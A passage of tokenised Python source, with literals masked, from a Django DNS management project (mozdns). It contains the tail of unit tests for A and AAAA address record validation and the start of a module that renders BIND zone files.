. m_o_e , <EOL> ip_str = "<STR_LIT>" , ip_type = '<STR_LIT:4>' ) <EOL> self . assertRaises ( ValidationError , self . do_update_A_record , <EOL> ** { '<STR_LIT>' : rec1 , '<STR_LIT>' : "<STR_LIT:.>" , "<STR_LIT>" : None } ) <EOL> self . assertRaises ( ValidationError , self . do_update_A_record , <EOL> ** { '<STR_LIT>' : rec0 , '<STR_LIT>' : "<STR_LIT>" , <EOL> "<STR_LIT>" : None } ) <EOL> self . assertRaises ( ValidationError , self . do_update_A_record , <EOL> ** { '<STR_LIT>' : rec0 , '<STR_LIT>' : "<STR_LIT>" , "<STR_LIT>" : <EOL> None } ) <EOL> self . assertRaises ( ValidationError , self . do_update_A_record , ** { <EOL> '<STR_LIT>' : rec0 , '<STR_LIT>' : None , "<STR_LIT>" : <NUM_LIT> } ) <EOL> self . assertRaises ( ValidationError , self . do_update_A_record , <EOL> ** { '<STR_LIT>' : rec0 , '<STR_LIT>' : None , "<STR_LIT>" : <EOL> "<STR_LIT>" } ) <EOL> self . assertRaises ( ValidationError , self . do_update_A_record , <EOL> ** { '<STR_LIT>' : rec0 , '<STR_LIT>' : None , "<STR_LIT>" : <EOL> <NUM_LIT> } ) <EOL> self . assertRaises ( ValidationError , self . do_update_A_record , <EOL> ** { '<STR_LIT>' : rec0 , '<STR_LIT>' : "<STR_LIT>" , "<STR_LIT>" : <EOL> <NUM_LIT> } ) <EOL> self . assertRaises ( ValidationError , self . do_update_A_record , <EOL> ** { '<STR_LIT>' : rec0 , '<STR_LIT>' : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" } ) <EOL> self . assertRaises ( ValidationError , self . do_update_A_record , <EOL> ** { '<STR_LIT>' : rec0 , '<STR_LIT>' : None , "<STR_LIT>" : <EOL> "<STR_LIT>" } ) <EOL> def test_update_invalid_ip_AAAA_record ( self ) : <EOL> osu_block = "<STR_LIT>" <EOL> boot_strap_ipv6_reverse_domain ( "<STR_LIT>" ) <EOL> rec0 = AddressRecord ( label = '<STR_LIT:foo>' , domain = self . z_o_e , <EOL> ip_str = osu_block + "<STR_LIT>" , ip_type = '<STR_LIT>' ) <EOL> self . assertRaises ( ValidationError , self . do_update_AAAA_record , ** { <EOL> '<STR_LIT>' : rec0 , '<STR_LIT>' : None , '<STR_LIT>' : <NUM_LIT> } ) <EOL> self . assertRaises ( ValidationError , self . do_update_AAAA_record , <EOL> ** { '<STR_LIT>' : rec0 , '<STR_LIT>' : None , <EOL> '<STR_LIT>' : osu_block + "<STR_LIT>" } ) <EOL> self . assertRaises ( ValidationError , self . do_update_AAAA_record , <EOL> ** { '<STR_LIT>' : rec0 , '<STR_LIT>' : "<STR_LIT>" , <EOL> '<STR_LIT>' : osu_block } ) <EOL> self . assertRaises ( ValidationError , self . do_update_AAAA_record , <EOL> ** { '<STR_LIT>' : rec0 , '<STR_LIT>' : "<STR_LIT>" , <EOL> '<STR_LIT>' : <NUM_LIT> } ) <EOL> self . assertRaises ( ValidationError , self . do_update_AAAA_record , <EOL> ** { '<STR_LIT>' : rec0 , '<STR_LIT>' : None , <EOL> '<STR_LIT>' : "<STR_LIT>" } ) <EOL> self . assertRaises ( ValidationError , self . do_update_AAAA_record , <EOL> ** { '<STR_LIT>' : rec0 , '<STR_LIT>' : "<STR_LIT>" , <EOL> '<STR_LIT>' : osu_block + "<STR_LIT>" } ) <EOL> self . assertRaises ( ValidationError , self . do_update_AAAA_record , <EOL> ** { '<STR_LIT>' : rec0 , '<STR_LIT>' : "<STR_LIT>" , <EOL> '<STR_LIT>' : None } ) <EOL> def do_remove_A_record ( self , aname , domain , ip ) : <EOL> aret = AddressRecord ( <EOL> label = aname , domain = domain , ip_str = ip , ip_type = '<STR_LIT:4>' ) <EOL> aret . save ( ) <EOL> self . assertTrue ( aret ) <EOL> aret . delete ( ) <EOL> aret = AddressRecord . objects . filter ( <EOL> label = aname , domain = domain , ip_str = ip ) <EOL> self . assertFalse ( aret ) <EOL> def do_remove_AAAA_record ( self , aname , domain , ip ) : <EOL> aret = AddressRecord ( <EOL> label = aname , domain = domain , ip_str = ip , ip_type = '<STR_LIT>' ) <EOL> aret . save ( ) <EOL> self . assertTrue ( aret ) <EOL> aret . delete ( ) <EOL> nret = AddressRecord . objects . filter ( <EOL> label = aname , domain = domain , ip_str = ip ) <EOL> self . assertFalse ( nret ) <EOL> def test_remove_A_address_records ( self ) : <EOL> self . do_remove_A_record ( "<STR_LIT>" , self . o_e , "<STR_LIT>" ) <EOL> self . do_remove_A_record ( "<STR_LIT>" , self . o_e , "<STR_LIT>" ) <EOL> self . do_remove_A_record ( "<STR_LIT>" , self . o_e , "<STR_LIT>" ) <EOL> self . do_remove_A_record ( "<STR_LIT>" , self . o_e , "<STR_LIT>" ) <EOL> self . do_remove_A_record ( "<STR_LIT>" , self . o_e , "<STR_LIT>" ) <EOL> self . do_remove_A_record ( "<STR_LIT>" , self . o_e , "<STR_LIT>" ) <EOL> self . do_remove_A_record ( "<STR_LIT>" , self . o_e , "<STR_LIT>" ) <EOL> self . do_remove_A_record ( "<STR_LIT>" , self . o_e , "<STR_LIT>" ) <EOL> self . do_remove_A_record ( "<STR_LIT:right>" , self . o_e , "<STR_LIT>" ) <EOL> self . do_remove_A_record ( "<STR_LIT>" , self . f_o_e , "<STR_LIT>" ) <EOL> self . do_remove_A_record ( "<STR_LIT>" , self . f_o_e , "<STR_LIT>" ) <EOL> self . do_remove_A_record ( "<STR_LIT>" , self . f_o_e , "<STR_LIT>" ) <EOL> self . do_remove_A_record ( "<STR_LIT>" , self . f_o_e , "<STR_LIT>" ) <EOL> self . do_remove_A_record ( "<STR_LIT>" , self . f_o_e , "<STR_LIT>" ) <EOL> self . do_remove_A_record ( "<STR_LIT>" , self . f_o_e , "<STR_LIT>" ) <EOL> self . do_remove_A_record ( "<STR_LIT>" , self . f_o_e , "<STR_LIT>" ) <EOL> self . do_remove_A_record ( "<STR_LIT>" , self . f_o_e , "<STR_LIT>" ) <EOL> self . do_remove_A_record ( "<STR_LIT:right>" , self . f_o_e , "<STR_LIT>" ) <EOL> def test_remove_AAAA_address_records ( self ) : <EOL> osu_block = "<STR_LIT>" <EOL> boot_strap_ipv6_reverse_domain ( "<STR_LIT>" ) <EOL> self . do_remove_AAAA_record ( "<STR_LIT>" , self . o_e , osu_block + "<STR_LIT>" ) <EOL> self . do_remove_AAAA_record ( "<STR_LIT>" , self . o_e , osu_block + "<STR_LIT>" ) <EOL> self . do_remove_AAAA_record ( "<STR_LIT>" , self . o_e , osu_block + "<STR_LIT>" ) <EOL> self . do_remove_AAAA_record ( "<STR_LIT>" , self . o_e , osu_block + "<STR_LIT>" ) <EOL> self . do_remove_AAAA_record ( "<STR_LIT>" , self . o_e , osu_block + "<STR_LIT>" ) <EOL> self . do_remove_AAAA_record ( "<STR_LIT>" , self . o_e , osu_block + "<STR_LIT>" ) <EOL> self . do_remove_AAAA_record ( "<STR_LIT>" , self . o_e , osu_block + "<STR_LIT>" ) <EOL> self . do_remove_AAAA_record ( "<STR_LIT>" , self . f_o_e , osu_block + "<STR_LIT>" ) <EOL> self . do_remove_AAAA_record ( "<STR_LIT>" , self . f_o_e , osu_block + "<STR_LIT>" ) <EOL> self . do_remove_AAAA_record ( "<STR_LIT>" , self . f_o_e , osu_block + "<STR_LIT>" ) <EOL> self . do_remove_AAAA_record ( "<STR_LIT>" , self . f_o_e , osu_block + "<STR_LIT>" ) <EOL> self . do_remove_AAAA_record ( "<STR_LIT>" , self . f_o_e , osu_block + "<STR_LIT>" ) <EOL> self . do_remove_AAAA_record ( "<STR_LIT>" , self . f_o_e , osu_block + "<STR_LIT>" ) <EOL> self . do_remove_AAAA_record ( "<STR_LIT>" , self . f_o_e , osu_block + "<STR_LIT>" ) <EOL> def do_add_record ( self , data ) : <EOL> rec = AddressRecord ( label = data [ '<STR_LIT:label>' ] , domain = data [ <EOL> '<STR_LIT>' ] , ip_str = data [ '<STR_LIT>' ] , ip_type = '<STR_LIT:4>' ) <EOL> rec . save ( ) <EOL> self . assertTrue ( rec . __repr__ ( ) ) <EOL> self . assertTrue ( rec . get_absolute_url ( ) ) <EOL> self . assertTrue ( rec . get_edit_url ( ) ) <EOL> self . assertTrue ( rec . get_delete_url ( ) ) <EOL> self . assertTrue ( rec . details ( ) ) <EOL> search = AddressRecord . objects . filter ( label = data [ '<STR_LIT:label>' ] , <EOL> domain = data [ '<STR_LIT>' ] , <EOL> ip_type = '<STR_LIT:4>' , ip_str = data [ '<STR_LIT>' ] ) <EOL> found = False <EOL> for record in search : <EOL> if record . ip_str == data [ '<STR_LIT>' ] : <EOL> found = True <EOL> self . assertTrue ( found ) <EOL> return rec <EOL> def do_add_record6 ( self , data ) : <EOL> rec = AddressRecord ( label = data [ '<STR_LIT:label>' ] , domain = data [ <EOL> '<STR_LIT>' ] , ip_str = data [ '<STR_LIT>' ] , ip_type = '<STR_LIT>' ) <EOL> rec . save ( ) <EOL> self . assertTrue ( rec . __repr__ ( ) ) <EOL> self . assertTrue ( rec . get_absolute_url ( ) ) <EOL> self . assertTrue ( rec . get_edit_url ( ) ) <EOL> self . assertTrue ( rec . get_delete_url ( ) ) <EOL> self . assertTrue ( rec . details ( ) ) <EOL> def test_add_A_address_glob_records ( self ) : <EOL> rec = AddressRecord ( label = '<STR_LIT>' , domain = self . o_e , <EOL> ip_str = "<STR_LIT>" , ip_type = '<STR_LIT:4>' ) <EOL> rec . clean ( ) <EOL> rec . save ( ) <EOL> self . assertEqual ( rec . __str__ ( ) , "<STR_LIT>" ) <EOL> data = { '<STR_LIT:label>' : '<STR_LIT:*>' , '<STR_LIT>' : self . f_o_e , '<STR_LIT>' : "<STR_LIT>" } <EOL> self . do_add_record ( data ) <EOL> data = { '<STR_LIT:label>' : '<STR_LIT>' , '<STR_LIT>' : self . f_o_e , '<STR_LIT>' : <EOL> "<STR_LIT>" } <EOL> self . do_add_record ( data ) <EOL> data = { '<STR_LIT:label>' : '<STR_LIT>' , '<STR_LIT>' : self . o_e , '<STR_LIT>' : "<STR_LIT>" } <EOL> self . do_add_record ( data ) <EOL> data = { '<STR_LIT:label>' : '<STR_LIT>' , '<STR_LIT>' : self . f_o_e , '<STR_LIT>' : "<STR_LIT>" } <EOL> self . do_add_record ( data ) <EOL> data = { '<STR_LIT:label>' : '<STR_LIT>' , '<STR_LIT>' : self . o_e , '<STR_LIT>' : "<STR_LIT>" } <EOL> self . do_add_record ( data ) <EOL> data = { '<STR_LIT:label>' : '<STR_LIT>' , '<STR_LIT>' : self . f_o_e , '<STR_LIT>' : "<STR_LIT>" } <EOL> self . do_add_record ( data ) <EOL> data = { '<STR_LIT:label>' : '<STR_LIT>' , '<STR_LIT>' : self . o_e , '<STR_LIT>' : "<STR_LIT>" } <EOL> self . do_add_record ( data ) <EOL> def test_add_address_underscore_in_name_domain ( self ) : <EOL> d = Domain ( name = "<STR_LIT>" ) <EOL> d . save ( ) <EOL> data = { '<STR_LIT:label>' : '<STR_LIT:*>' , '<STR_LIT>' : d , '<STR_LIT>' : "<STR_LIT>" } <EOL> self . do_add_record ( data ) <EOL> data = { '<STR_LIT:label>' : '<STR_LIT:foo>' , '<STR_LIT>' : d , '<STR_LIT>' : "<STR_LIT>" } <EOL> a = self . do_add_record ( data ) <EOL> a . save ( ) <EOL> data = { '<STR_LIT:label>' : '<STR_LIT>' , '<STR_LIT>' : d , '<STR_LIT>' : "<STR_LIT>" } <EOL> self . do_add_record ( data ) <EOL> def test_add_A_address_records ( self ) : <EOL> rec = AddressRecord ( label = '<STR_LIT>' , domain = self . o_e , <EOL> ip_str = "<STR_LIT>" , ip_type = '<STR_LIT:4>' ) <EOL> rec . clean ( ) <EOL> rec . save ( ) <EOL> self . assertEqual ( rec . __str__ ( ) , "<STR_LIT>" ) <EOL> data = { '<STR_LIT:label>' : '<STR_LIT>' , '<STR_LIT>' : self . f_o_e , '<STR_LIT>' : <EOL> "<STR_LIT>" } <EOL> self . do_add_record ( data ) <EOL> data = { '<STR_LIT:label>' : '<STR_LIT>' , '<STR_LIT>' : self . o_e , '<STR_LIT>' : "<STR_LIT>" } <EOL> self . do_add_record ( data ) <EOL> data = { '<STR_LIT:label>' : '<STR_LIT>' , '<STR_LIT>' : self . f_o_e , '<STR_LIT>' : "<STR_LIT>" } <EOL> self . do_add_record ( data ) <EOL> data = { '<STR_LIT:label>' : '<STR_LIT>' , '<STR_LIT>' : self . o_e , '<STR_LIT>' : "<STR_LIT>" } <EOL> self . do_add_record ( data ) <EOL> data = { '<STR_LIT:label>' : '<STR_LIT>' , '<STR_LIT>' : self . f_o_e , '<STR_LIT>' : "<STR_LIT>" } <EOL> self . do_add_record ( data ) <EOL> data = { '<STR_LIT:label>' : '<STR_LIT>' , '<STR_LIT>' : self . o_e , '<STR_LIT>' : "<STR_LIT>" } <EOL> self . do_add_record ( data ) <EOL> def test_add_AAAA_address_records ( self ) : <EOL> osu_block = "<STR_LIT>" <EOL> boot_strap_ipv6_reverse_domain ( "<STR_LIT>" ) <EOL> data = { '<STR_LIT:label>' : '<STR_LIT>' , '<STR_LIT>' : self . f_o_e , '<STR_LIT>' : osu_block + "<STR_LIT>" } <EOL> self . do_add_record6 ( data ) <EOL> data = { '<STR_LIT:label>' : '<STR_LIT>' , '<STR_LIT>' : self . o_e , '<STR_LIT>' : osu_block + "<STR_LIT>" } <EOL> self . do_add_record6 ( data ) <EOL> data = { '<STR_LIT:label>' : '<STR_LIT>' , '<STR_LIT>' : self . o_e , '<STR_LIT>' : osu_block + "<STR_LIT>" } <EOL> self . do_add_record6 ( data ) <EOL> data = { '<STR_LIT:label>' : '<STR_LIT>' , '<STR_LIT>' : self . f_o_e , '<STR_LIT>' : osu_block + "<STR_LIT>" } <EOL> self . do_add_record6 ( data ) <EOL> data = { '<STR_LIT:label>' : '<STR_LIT>' , '<STR_LIT>' : self . f_o_e , '<STR_LIT>' : osu_block + "<STR_LIT>" } <EOL> self . do_add_record6 ( data ) <EOL> data = { '<STR_LIT:label>' : '<STR_LIT>' , '<STR_LIT>' : self . o_e , '<STR_LIT>' : osu_block + "<STR_LIT>" } <EOL> self . do_add_record6 ( data ) <EOL> data = { '<STR_LIT:label>' : '<STR_LIT>' , '<STR_LIT>' : self . o_e , '<STR_LIT>' : osu_block + "<STR_LIT>" } <EOL> self . do_add_record6 ( data ) <EOL> data = { '<STR_LIT:label>' : '<STR_LIT>' , '<STR_LIT>' : self . f_o_e , '<STR_LIT>' : osu_block + "<STR_LIT>" } <EOL> self . do_add_record6 ( data ) <EOL> data = { '<STR_LIT:label>' : '<STR_LIT>' , '<STR_LIT>' : self . o_e , '<STR_LIT>' : <EOL> osu_block + "<STR_LIT>" } <EOL> self . do_add_record6 ( data ) <EOL> data = { '<STR_LIT:label>' : '<STR_LIT>' , '<STR_LIT>' : self . f_o_e , '<STR_LIT>' : <EOL> osu_block + "<STR_LIT>" } <EOL> self . do_add_record6 ( data ) <EOL> data = { '<STR_LIT:label>' : '<STR_LIT>' , '<STR_LIT>' : <EOL> self . f_o_e , '<STR_LIT>' : osu_block + "<STR_LIT>" } <EOL> self . do_add_record6 ( data ) <EOL> def test_no_type ( self ) : <EOL> data = { '<STR_LIT:label>' : '<STR_LIT>' , '<STR_LIT>' : self . f_o_e , '<STR_LIT>' : '<STR_LIT>' } <EOL> rec = AddressRecord ( label = data [ '<STR_LIT:label>' ] , domain = data [ <EOL> '<STR_LIT>' ] , ip_str = data [ '<STR_LIT>' ] , ip_type = '<STR_LIT:x>' ) <EOL> self . assertRaises ( ValidationError , rec . save ) <EOL> data = { '<STR_LIT:label>' : '<STR_LIT>' , '<STR_LIT>' : self . f_o_e , '<STR_LIT>' : '<STR_LIT>' } <EOL> rec = AddressRecord ( <EOL> label = data [ '<STR_LIT:label>' ] , domain = data [ '<STR_LIT>' ] , ip_str = data [ '<STR_LIT>' ] ) <EOL> self . assertRaises ( ValidationError , rec . save ) <EOL> def test_bad_A_ip ( self ) : <EOL> osu_block = "<STR_LIT>" <EOL> data = { '<STR_LIT:label>' : '<STR_LIT>' , '<STR_LIT>' : self . o_e , '<STR_LIT>' : osu_block + "<STR_LIT>" } <EOL> self . assertRaises ( ValidationError , self . do_add_record , data ) <EOL> data = { '<STR_LIT:label>' : '<STR_LIT>' , '<STR_LIT>' : self . o_e , '<STR_LIT>' : <NUM_LIT> } <EOL> self . assertRaises ( ValidationError , self . do_add_record , data ) <EOL> data = { '<STR_LIT:label>' : '<STR_LIT>' , '<STR_LIT>' : self . o_e , '<STR_LIT>' : "<STR_LIT>" } <EOL> self . assertRaises ( ValidationError , self . do_add_record , data ) <EOL> data = { '<STR_LIT:label>' : '<STR_LIT>' , '<STR_LIT>' : self . o_e , '<STR_LIT>' : "<STR_LIT>" } <EOL> self . assertRaises ( ValidationError , self . do_add_record , data ) <EOL> def test_bad_AAAA_ip ( self ) : <EOL> osu_block = "<STR_LIT>" <EOL> data = { '<STR_LIT:label>' : '<STR_LIT>' , '<STR_LIT>' : self . o_e , '<STR_LIT>' : "<STR_LIT>" } <EOL> self . assertRaises ( ValidationError , self . do_add_record6 , data ) <EOL> data = { '<STR_LIT:label>' : '<STR_LIT>' , '<STR_LIT>' : self . o_e , '<STR_LIT>' : osu_block + "<STR_LIT>" } <EOL> self . assertRaises ( ValidationError , self . do_add_record6 , data ) <EOL> data = { '<STR_LIT:label>' : '<STR_LIT>' , '<STR_LIT>' : self . o_e , '<STR_LIT>' : <EOL> <NUM_LIT> } <EOL> self . assertRaises ( ValidationError , self . do_add_record6 , data ) <EOL> def test_add_A_records_exist ( self ) : <EOL> data = { '<STR_LIT:label>' : '<STR_LIT>' , '<STR_LIT>' : self . f_o_e , '<STR_LIT>' : "<STR_LIT>" } <EOL> self . do_add_record ( data ) <EOL> self . assertRaises ( ValidationError , self . do_add_record , data ) <EOL> data = { '<STR_LIT:label>' : '<STR_LIT>' , '<STR_LIT>' : self . f_o_e , '<STR_LIT>' : "<STR_LIT>" } <EOL> self . do_add_record ( data ) <EOL> self . assertRaises ( ValidationError , self . do_add_record , data ) <EOL> def test_add_AAAA_records_exist ( self ) : <EOL> osu_block = "<STR_LIT>" <EOL> boot_strap_ipv6_reverse_domain ( "<STR_LIT>" ) <EOL> data = { '<STR_LIT:label>' : '<STR_LIT>' , '<STR_LIT>' : self . f_o_e , '<STR_LIT>' : osu_block + "<STR_LIT>" } <EOL> self . do_add_record6 ( data ) <EOL> self . assertRaises ( ValidationError , self . do_add_record6 , data ) <EOL> data = { '<STR_LIT:label>' : '<STR_LIT>' , '<STR_LIT>' : self . f_o_e , '<STR_LIT>' : osu_block + "<STR_LIT>" } <EOL> self . do_add_record6 ( data ) <EOL> self . assertRaises ( ValidationError , self . do_add_record6 , data ) <EOL> data = { '<STR_LIT:label>' : '<STR_LIT>' , '<STR_LIT>' : self . o_e , '<STR_LIT>' : osu_block + "<STR_LIT>" } <EOL> self . do_add_record6 ( data ) <EOL> self . assertRaises ( ValidationError , self . do_add_record6 , data ) <EOL> def test_add_A_invalid_address_records ( self ) : <EOL> data = { '<STR_LIT:label>' : "<STR_LIT>" , '<STR_LIT>' : self . e , '<STR_LIT>' : "<STR_LIT>" } <EOL> self . assertRaises ( ValidationError , self . do_add_record , data ) <EOL> data = { '<STR_LIT:label>' : "<STR_LIT:foo>" , '<STR_LIT>' : self . o_e , '<STR_LIT>' : "<STR_LIT>" } <EOL> self . assertRaises ( ValidationError , self . do_add_record , data ) <EOL> data = { '<STR_LIT:label>' : '<STR_LIT>' , '<STR_LIT>' : self . o_e , '<STR_LIT>' : "<STR_LIT>" } <EOL> self . assertRaises ( ValidationError , self . do_add_record , data ) <EOL> data = { '<STR_LIT:label>' : '<STR_LIT>' , '<STR_LIT>' : self . o_e , '<STR_LIT>' : <EOL> "<STR_LIT>" } <EOL> self . assertRaises ( ValidationError , self . do_add_record , data ) <EOL> data = { '<STR_LIT:label>' : '<STR_LIT>' , '<STR_LIT>' : self . o_e , <EOL> '<STR_LIT>' : "<STR_LIT>" } <EOL> self . assertRaises ( ValidationError , self . do_add_record , data ) <EOL> data = { '<STR_LIT:label>' : '<STR_LIT>' , '<STR_LIT>' : self . o_e , '<STR_LIT>' : "<STR_LIT>" } <EOL> self . assertRaises ( ValidationError , self . do_add_record , data ) <EOL> data = { '<STR_LIT:label>' : '<STR_LIT>' , '<STR_LIT>' : self . o_e , '<STR_LIT>' : "<STR_LIT>" } <EOL> self . assertRaises ( ValidationError , self . do_add_record , data ) <EOL> data = { '<STR_LIT:label>' : '<STR_LIT>' , '<STR_LIT>' : self . o_e , '<STR_LIT>' : "<STR_LIT>" } <EOL> self . assertRaises ( ValidationError , self . do_add_record , data ) <EOL> data = { '<STR_LIT:label>' : '<STR_LIT>' , '<STR_LIT>' : self . o_e , '<STR_LIT>' : "<STR_LIT>" } <EOL> self . assertRaises ( ValidationError , self . do_add_record , data ) <EOL> def test_add_AAAA_invalid_address_records ( self ) : <EOL> osu_block = "<STR_LIT>" <EOL> boot_strap_ipv6_reverse_domain ( "<STR_LIT>" ) <EOL> data = { '<STR_LIT:label>' : '<STR_LIT>' , '<STR_LIT>' : self . o_e , '<STR_LIT>' : osu_block + "<STR_LIT>" } <EOL> self . assertRaises ( ValidationError , self . do_add_record6 , data ) <EOL> data = { '<STR_LIT:label>' : '<STR_LIT>' , '<STR_LIT>' : self . o_e , '<STR_LIT>' : <EOL> osu_block + "<STR_LIT>" } <EOL> self . assertRaises ( ValidationError , self . do_add_record6 , data ) <EOL> data = { '<STR_LIT:label>' : '<STR_LIT>' , '<STR_LIT>' : self . o_e , <EOL> '<STR_LIT>' : osu_block + "<STR_LIT>" } <EOL> self . assertRaises ( ValidationError , self . do_add_record6 , data ) <EOL> data = { '<STR_LIT:label>' : '<STR_LIT>' , '<STR_LIT>' : self . o_e , '<STR_LIT>' : osu_block + "<STR_LIT>" } <EOL> self . assertRaises ( ValidationError , self . do_add_record6 , data ) <EOL> data = { '<STR_LIT:label>' : '<STR_LIT>' , '<STR_LIT>' : self . o_e , '<STR_LIT>' : <EOL> osu_block + "<STR_LIT>" } <EOL> self . assertRaises ( ValidationError , self . do_add_record6 , data ) <EOL> data = { '<STR_LIT:label>' : '<STR_LIT>' , '<STR_LIT>' : self . o_e , '<STR_LIT>' : osu_block + "<STR_LIT>" } <EOL> self . assertRaises ( ValidationError , self . do_add_record6 , data ) <EOL> data = { '<STR_LIT:label>' : '<STR_LIT>' , '<STR_LIT>' : self . o_e , '<STR_LIT>' : osu_block + "<STR_LIT>" } <EOL> self . assertRaises ( ValidationError , self . do_add_record6 , data ) <EOL> def test_no_update_when_glue ( self ) : <EOL> """<STR_LIT>""" <EOL> label = '<STR_LIT>' <EOL> glue = AddressRecord ( label = label , domain = self . o_e , <EOL> ip_str = '<STR_LIT>' , ip_type = '<STR_LIT:4>' ) <EOL> glue . save ( ) <EOL> server = "<STR_LIT>" % ( label , self . o_e ) <EOL> ns = Nameserver ( domain = self . o_e , server = server ) <EOL> ns . save ( ) <EOL> self . assertTrue ( ns . glue == glue ) <EOL> glue . label = "<STR_LIT>" <EOL> self . assertRaises ( ValidationError , glue . save ) <EOL> glue . domain = self . m_o_e <EOL> self . assertRaises ( ValidationError , glue . save ) <EOL> glue = AddressRecord . objects . get ( pk = glue . pk ) <EOL> glue . label = "<STR_LIT>" <EOL> glue . domain = self . e <EOL> self . assertRaises ( ValidationError , glue . save ) <EOL> glue = AddressRecord . objects . get ( pk = glue . pk ) <EOL> glue . ip_str = "<STR_LIT>" <EOL> glue . save ( ) <EOL> def test_delete_with_cname_pointing_to_a ( self ) : <EOL> label = '<STR_LIT>' <EOL> a = AddressRecord ( label = label , domain = self . o_e , ip_str = <EOL> '<STR_LIT>' , ip_type = '<STR_LIT:4>' ) <EOL> a . clean ( ) <EOL> a . save ( ) <EOL> cn = CNAME ( label = "<STR_LIT>" , domain = self . o_e , target = label + "<STR_LIT:.>" + <EOL> self . o_e . name ) <EOL> cn . clean ( ) <EOL> cn . save ( ) <EOL> self . assertRaises ( ValidationError , a . delete ) <EOL> a . delete ( check_cname = False ) </s>
<s> from django . db . models import Q <EOL> from mozdns . address_record . models import AddressRecord <EOL> from mozdns . cname . models import CNAME <EOL> from mozdns . mx . models import MX <EOL> from mozdns . nameserver . models import Nameserver <EOL> from mozdns . ptr . models import PTR <EOL> from mozdns . srv . models import SRV <EOL> from mozdns . txt . models import TXT <EOL> from mozdns . sshfp . models import SSHFP <EOL> from mozdns . view . models import View <EOL> from core . interface . static_intr . models import StaticInterface <EOL> from gettext import gettext as _ <EOL> from core . utils import fail_mail <EOL> DEFAULT_TTL = <NUM_LIT> <EOL> def render_soa_only ( soa , root_domain ) : <EOL> BUILD_STR = _ ( "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" . format ( <EOL> ttl = soa . ttl , <EOL> root_domain = root_domain . name , primary = soa . primary , <EOL> contact = soa . contact , refresh = str ( soa . refresh ) , <EOL> retry = str ( soa . retry ) , expire = str ( soa . expire ) , <EOL> minimum = soa . minimum ) ) <EOL> return BUILD_STR <EOL> def render_rdtype ( rdtype_set , ** kwargs ) : <EOL> BUILD_STR = "<STR_LIT>" <EOL> for obj in rdtype_set : <EOL> BUILD_STR += _ ( obj . bind_render_record ( ** kwargs ) + "<STR_LIT:\n>" ) <EOL> return BUILD_STR <EOL> def _render_forward_zone ( default_ttl , nameserver_set , mx_set , <EOL> addressrecord_set , interface_set , cname_set , srv_set , <EOL> txt_set , sshfp_set ) : <EOL> BUILD_STR = "<STR_LIT>" <EOL> BUILD_STR += render_rdtype ( nameserver_set ) <EOL> BUILD_STR += render_rdtype ( mx_set ) <EOL> BUILD_STR += render_rdtype ( txt_set ) <EOL> BUILD_STR += render_rdtype ( sshfp_set ) <EOL> BUILD_STR += render_rdtype ( srv_set ) <EOL> BUILD_STR += render_rdtype ( cname_set ) <EOL> BUILD_STR += render_rdtype ( interface_set , rdtype = '<STR_LIT:A>' ) <EOL> BUILD_STR += render_rdtype ( addressrecord_set ) <EOL> return BUILD_STR <EOL> def render_forward_zone ( view , mega_filter ) : <EOL> data = _render_forward_zone ( <EOL> default_ttl = DEFAULT_TTL , <EOL> nameserver_set = Nameserver . objects . filter ( mega_filter ) . filter ( <EOL> views__name = view . name ) . order_by ( '<STR_LIT>' ) , <EOL> mx_set = MX . objects . filter ( mega_filter ) . filter ( views__name = view . name <EOL> ) . order_by ( '<STR_LIT>' ) , <EOL> addressrecord_set = AddressRecord . objects . filter ( mega_filter ) . filter ( <EOL> views__name = view . name ) . order_by ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' ) , <EOL> interface_set = StaticInterface . objects . filter ( <EOL> mega_filter , dns_enabled = True ) . filter ( <EOL> views__name = view . name ) . order_by ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' ) , <EOL> cname_set = CNAME . objects . filter ( mega_filter ) . filter ( <EOL> views__name = view . name ) . order_by ( '<STR_LIT>' ) , <EOL> srv_set = SRV . objects . filter ( mega_filter ) . filter ( views__name = view . name <EOL> ) . order_by ( <EOL> '<STR_LIT>' , '<STR_LIT>' ) , <EOL> txt_set = TXT . objects . filter ( mega_filter ) . filter ( views__name = view . name <EOL> ) . order_by ( <EOL> '<STR_LIT>' , '<STR_LIT>' ) , <EOL> sshfp_set = SSHFP . objects . filter ( mega_filter ) . filter ( <EOL> views__name = view . name ) . order_by ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ) <EOL> return data <EOL> def _render_reverse_zone ( default_ttl , nameserver_set , interface_set , ptr_set ) : <EOL> BUILD_STR = '<STR_LIT>' <EOL> BUILD_STR += render_rdtype ( nameserver_set ) <EOL> BUILD_STR += render_rdtype ( ptr_set ) <EOL> BUILD_STR += render_rdtype ( interface_set , reverse = True , rdtype = '<STR_LIT>' ) <EOL> return BUILD_STR <EOL> def render_reverse_zone ( view , domain_mega_filter , rdomain_mega_filter ) : <EOL> data = _render_reverse_zone ( <EOL> default_ttl = DEFAULT_TTL , <EOL> nameserver_set = Nameserver . objects . filter ( domain_mega_filter ) . filter ( <EOL> views__name = view . name ) . order_by ( '<STR_LIT>' ) , <EOL> interface_set = StaticInterface . objects . filter ( <EOL> rdomain_mega_filter , dns_enabled = True ) . filter ( <EOL> views__name = view . name ) . order_by ( <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT:label>' , '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ptr_set = PTR . objects . filter ( rdomain_mega_filter ) . filter ( <EOL> views__name = view . name ) . order_by ( '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' ) , <EOL> ) <EOL> return data <EOL> def build_zone_data ( view , root_domain , soa , logf = None ) : <EOL> """<STR_LIT>""" <EOL> ztype = '<STR_LIT>' if root_domain . is_reverse else '<STR_LIT>' <EOL> if ( soa . has_record_set ( view = view , exclude_ns = True ) and <EOL> not root_domain . nameserver_set . filter ( views = view ) . exists ( ) ) : <EOL> msg = ( "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" . format ( root_domain , view . name ) ) <EOL> fail_mail ( msg , subject = "<STR_LIT>" ) <EOL> logf ( '<STR_LIT>' , msg ) <EOL> return '<STR_LIT>' <EOL> domains = soa . domain_set . all ( ) . order_by ( '<STR_LIT:name>' ) <EOL> domain_mega_filter = Q ( domain = root_domain ) <EOL> for domain in domains : <EOL> domain_mega_filter = 